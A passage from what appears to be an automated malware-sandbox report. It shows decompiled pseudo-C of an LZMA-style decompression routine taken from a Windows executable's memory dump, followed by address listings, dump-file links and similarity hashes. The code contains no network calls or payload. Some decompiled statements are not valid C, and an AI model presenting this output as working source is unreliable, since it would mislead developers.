													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ce2
0x00406ce2
0x00406ce6
0x00406cf3
0x00406cfd
0x00000000
0x00406ce8
0x00406ce8
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00406f91
0x00406f91
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91
0x00000000
0x00406ce6

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
